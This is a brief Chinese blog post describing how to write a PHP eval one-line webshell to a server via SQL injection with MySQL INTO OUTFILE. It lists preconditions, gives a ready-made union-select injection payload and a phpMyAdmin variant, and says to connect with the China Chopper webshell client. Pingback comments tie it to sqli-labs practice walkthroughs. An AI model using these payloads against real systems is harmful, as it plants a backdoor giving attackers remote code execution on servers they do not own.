sql语句利用into outfile写入一句话

管理员 2020-02-23 PM 105℃ 2条

利用需要的条件有:

1、对web目录需要有写权限能够使用单引号

2、知道绝对路径

3、没有配置-secure-file-priv(在mysql的配置文件中需要有一句 secure_file_priv='' ,没有的话自行添加或修改)

当知道路径时,可以直接用?id=1 union select "<?php @eval($_POST['123']);?>" into outfile"C:/phpStudy/WWW/a.php"

或者采用PHPmyadmin,选择一个数据库如test,在数据库中新创建一个表aa,在aa中插入一个数据<?php @eval($_POST['123']);?>,然后用select * from aa into outfile 'C:/phpStudy/WWW/a.php';   #将aaa中的数据导出到文件a.php

 

语句执行成功后利用菜刀进行连接

标签: 写文件注入

非特殊说明,本博所有文章均为博主原创。

评论啦~



已有 2 条评论


  1. sqli-labs通关手册 – 0verflow技术区

    […] 2.查询成功时显示“You are in…. Use outfile……”,其中“outfile”是mysql里面的一个向系统写入文件的函数,关于outfile写入一句话木马 […]

    回复 2020-02-23 15:58
  2. sql-labs第七关 – 0verflow技术区

    […] 2.查询成功时显示“You are in…. Use outfile……”,其中“outfile”是mysql里面的一个向系统写入文件的函数,关于outfile写入一句话木马 […]

    回复 2020-02-24 11:39